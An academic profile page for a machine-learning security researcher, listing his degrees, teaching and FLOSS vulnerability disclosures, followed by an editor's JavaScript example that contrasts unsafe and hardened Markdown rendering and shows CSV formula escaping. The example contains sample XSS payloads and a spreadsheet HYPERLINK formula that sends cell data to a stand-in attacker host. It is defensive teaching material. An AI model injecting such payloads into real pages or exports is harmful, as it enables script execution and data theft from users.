Martin Gubri is a PhD candidate at the SnT centre, University of Luxembourg. His research interests are in adversarial machine learning, with a focus on the transferability of adversarial attacks.
He holds a Data Science degree from Ensae ParisTech and a Statistics degree from Toulouse School of Economics.
He has a personal interest in computer security, which has led him to discover several vulnerabilities in FLOSS projects.
PhD in Computer Science, 2023
University of Luxembourg, Luxembourg
Specialized Master in Data Science (w/ high honors), 2015
Ensae ParisTech, France
Master in Statistics and Econometrics (w/ highest honor), 2014
Toulouse School of Economics, France
Magistère in Economics and Statistics (w/ highest honor), 2014
Toulouse School of Economics and Paul Sabatier University, France
Bachelor in Economics and Mathematics, 2012
Toulouse School of Economics and Paul Sabatier University, France
Master: Advanced topics in Applied Machine Learning
2nd year of the Master in Computer Science. Two lectures; design and grading of the course project; course planning.
Project: Creation and evaluation of fill-in-the-blank notebooks (part 1 on preprocessing and part 3 on adversarial examples)
Master: Introduction to Machine Learning
2nd year of Master in Space Science. Six sessions, including four based on the Machine Learning Refined book and one based on the Applied Machine Learning course of Andreas C. Müller. Summary slides.
Master: Introduction to Machine Learning
2nd year of Master in Space Science. Two introductory lectures on Machine Learning. Slides.
Bachelor: Software engineering 2
3rd year of Bachelor in Computer Science. Four introductory lectures on Machine Learning Engineering. Course given online during lockdown. Quizzes on Moodle. Videos, Slides
I served as a (co-)reviewer for the following conferences and journals.
Other academic services
I have organized and run the weekly Machine Learning Reading Group at the SerVal group (University of Luxembourg) since February 2021.
Contributions to FLOSS Security
Vulnerabilities discovered (and, where noted, fixed):
| CVE | Software | Type | Description/Impact | Links |
|---|---|---|---|---|
| CVE-2017-6877 | Lutim | Stored XSS | Exposed all images uploaded by the user and their encryption keys | issue |
| CVE-2017-10975 | Lutim | Stored XSS | Same impact as above; hard to exploit in practice | issue |
| CVE-2017-1000051 | CryptPad | Stored XSS | Exposed encryption keys of user data | blog post |
| | TeleR | RCE | Three arbitrary code execution issues on their server | blog post soon |
| | Turtl | Stored XSS | Three XSS issues exposing encrypted data (incl. passwords) | |
| | NCrypt | Stored XSS | | issue |
| | not disclosed | Stored XSS | | |
| | not disclosed | Stored XSS | | |
| | Shaarli | Stored XSS | Markdown plugin | MR |
| | not disclosed | Stored XSS | | |
| | Framaforms | Improper Access Control | Exposed the URLs of all users' forms | No public record |
| | Framaforms | Stored XSS | Exposed responses to user forms; overly permissive formats allowed for untrusted users | issue |
| | Framaforms | Stored XSS | | issue |
| | Framaslides | Stored XSS | Markdown not sanitized | commit |
| | Framaslides | Stored XSS | Bypass of Markdown link sanitization (marked library not updated) | issue |
| | Framaslides | Stored XSS | | issue |
| CVE-2017-11594 | Loomio | Stored XSS | Markdown not sanitized; allows casting votes under other users' identities | commit, demo |
| | Loomio | Stored XSS | No restrictions on attached files (when served locally); allows casting votes under other users' identities | demo |
| | Framemo & Sandstorm's Scrumblr | Stored XSS | Markdown not sanitized | issue, PR |
| | Framemo & Sandstorm's Scrumblr | Formula Injection | | issue, MR |
| CVE-2017-1000039 | Framadate | Formula Injection | | issue, MR |
| | not disclosed | Stored XSS | | |
| CVE-2017-11593 | Markdown Preview Plus (Chrome extension) | Stored XSS | Left its users vulnerable to XSS on a large number of websites by converting text, Markdown and reST files to HTML without sanitization | issue |
| | not disclosed | Stored XSS | | |
| | Wallabag 2 & Graby | Stored XSS | | PR |
| | Kresus | Stored Self-XSS | Can be leveraged by importing a malicious JSON file | issue |
| | Dolomon | Stored (Self-)XSS | Multiple XSS; some can be leveraged through a CSRF issue | issue |
| | Dolomon | Improper Access Control | Gave access to the URLs saved by all users | issue |
| | Dolomon | Formula Injection | | issue |
| | not disclosed | Stored XSS | | |
| | share-on-diaspora WordPress plugin | Reflected Client XSS | Fix contributed; the vulnerability was discovered by someone else | PR |
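Two bug classes recur throughout this table: stored XSS from Markdown rendered to HTML without sanitization (including link-scheme bypasses) and formula injection in CSV exports. The example below is added by the editor to illustrate those classes side by side with a hardened form; it is not code from any project listed above and does not reproduce any specific reported issue. The two-feature Markdown subset, the sample payloads and the placeholder base URL `example.invalid` are all constructed for the illustration.

```javascript
// Editor-added illustration of two bug classes that recur in the table above:
// stored XSS from Markdown rendered to HTML without sanitization, and formula
// (CSV) injection in data exports. Toy code, not taken from any listed project.

const ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Markdown subset: inline links [text](url) and *emphasis*.
const INLINE = /\[([^\]]*)\]\(([^)\s]*)\)|\*([^*\n]+)\*/g;

// Vulnerable renderer: raw HTML in the source passes straight through, and any
// URL scheme (javascript:, data:, ...) ends up in href. This is the shape of
// "Markdown not sanitized" in the table.
function renderMarkdownUnsafe(md) {
  return md.replace(INLINE, (m, text, url, em) =>
    em !== undefined ? `<em>${em}</em>` : `<a href="${url}">${text}</a>`);
}

// Scheme allow-list. Parsing with the WHATWG URL class (what browsers use)
// instead of a regex means tricks like "java\tscript:" or "JaVaScRiPt:" resolve
// to the same protocol the browser would see. Relative URLs resolve against a
// placeholder base (example.invalid is a constructed value).
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);
function isSafeUrl(raw) {
  try {
    return SAFE_SCHEMES.has(new URL(raw, "https://example.invalid/").protocol);
  } catch {
    return false;
  }
}

// Hardened renderer: every run of plain text is HTML-escaped, link text and href
// are escaped separately, and links with a disallowed scheme degrade to text.
function renderMarkdownSafe(md) {
  let out = "";
  let last = 0;
  for (const m of md.matchAll(INLINE)) {
    out += escapeHtml(md.slice(last, m.index));
    const [whole, text, url, em] = m;
    if (em !== undefined) {
      out += `<em>${escapeHtml(em)}</em>`;
    } else if (isSafeUrl(url)) {
      out += `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`;
    } else {
      out += escapeHtml(text);
    }
    last = m.index + whole.length;
  }
  return out + escapeHtml(md.slice(last));
}

// Formula injection: a cell beginning with = + - @ (or tab / CR) is evaluated as
// a formula when the CSV is opened in a spreadsheet. Prefixing a single quote
// forces text; quoting the cell keeps commas, quotes and newlines from breaking
// the row. Apply this to untrusted free-text columns only: it also mangles "-5".
function csvCell(value) {
  let s = String(value);
  if (/^[=+\-@\t\r]/.test(s)) s = "'" + s;
  return `"${s.replace(/"/g, '""')}"`;
}
function toCsvRow(values) {
  return values.map(csvCell).join(",");
}

// Constructed sample inputs.
const MD_PAYLOAD = "See [docs](javascript:alert%281%29) <img src=x onerror=alert(1)>";
const CSV_PAYLOAD = '=HYPERLINK("https://attacker.invalid/?c="&A1,"click")';

function demo() {
  return {
    unsafe: renderMarkdownUnsafe(MD_PAYLOAD),
    safe: renderMarkdownSafe(MD_PAYLOAD),
    csv: toCsvRow(["alice", CSV_PAYLOAD]),
  };
}

console.log(demo());
```

Run with `node`. The point of `isSafeUrl` is that the check uses the browser's own URL algorithm, so whatever the renderer accepts is judged the way the browser will interpret it; a hand-written regex on the raw string is where the "link sanitization bypass" rows in the table typically come from. In a real project, use a maintained sanitizer on the rendered HTML rather than a hand-rolled renderer, and keep the Markdown library itself up to date.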